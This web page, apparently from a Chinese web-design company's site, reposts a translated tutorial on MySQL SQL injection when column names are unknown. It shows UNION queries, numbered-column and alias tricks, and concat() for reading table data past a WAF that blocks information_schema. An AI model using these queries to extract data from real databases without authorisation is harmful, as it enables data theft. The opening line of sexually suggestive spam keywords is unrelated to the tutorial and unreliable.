真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

MySQL在不知道列名情況下的注入詳解

前言

成都創(chuàng)新互聯(lián)公司是一家專注于網(wǎng)站建設(shè)、網(wǎng)站設(shè)計(jì)與策劃設(shè)計(jì),白云鄂網(wǎng)站建設(shè)哪家好?成都創(chuàng)新互聯(lián)公司做網(wǎng)站,專注于網(wǎng)站建設(shè)十年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:白云鄂等地區(qū)。白云鄂做網(wǎng)站價(jià)格咨詢:028-86922220

最近感覺腦子空空,全在為了刷洞去挖洞,還是回歸技術(shù)的本身讓自己舒服些。好了,下面話不多說了,來一起看看詳細(xì)的介紹吧

前提

以下情況適用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema庫],且已獲取到庫名和表名

① 當(dāng)只能獲取到表名,獲取不到列名或者只能獲取到無有效內(nèi)容的列名情況【例如 id】

② 當(dāng)希望通過information_schema庫中的表去獲取其他表的結(jié)構(gòu),即表名、列名等,但是這個(gè)庫被WAF過濾掉的情況

其實(shí)個(gè)人感覺這個(gè)方法還是對(duì) 5 版本以下的實(shí)用性比較強(qiáng)一些,因?yàn)閷?duì)我來說,一般遇到waf就放棄了(菜的真實(shí)23333)

解決

正常的查詢:

以下是正常查詢 test 庫中的 user 表內(nèi)容

select * from user;

MySQL在不知道列名情況下的注入詳解

UNION查詢:

select 1,2,3,4 union select * from user;

MySQL在不知道列名情況下的注入詳解

數(shù)字對(duì)應(yīng)列查詢:

可以使用數(shù)字來對(duì)應(yīng)列來進(jìn)行查詢,如 2 對(duì)應(yīng)了表里面的 name 列

select `2` from (select 1,2,3,4 union select * from user)a;

MySQL在不知道列名情況下的注入詳解

別名代替查詢:

當(dāng)反引號(hào) ` 不能使用的時(shí)候,可以使用別名來代替,如設(shè)置 2 的別名為 b

select b from (select 1,2 as b,3,4 union select * from user)a;

MySQL在不知道列名情況下的注入詳解

多列合并查詢:

同上:這里反引號(hào)不能用的話,一樣可以使用別名代替

select concat(`2`,0x3a,`3`) from (select 1,2,3,4 union select * from user)a limit 1,1;

MySQL在不知道列名情況下的注入詳解

僅作翻譯以及思路整理

原文鏈接:https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/

總結(jié)

以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,謝謝大家對(duì)創(chuàng)新互聯(lián)的支持。


當(dāng)前名稱:MySQL在不知道列名情況下的注入詳解
新聞來源:http://weahome.cn/article/iijicc.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部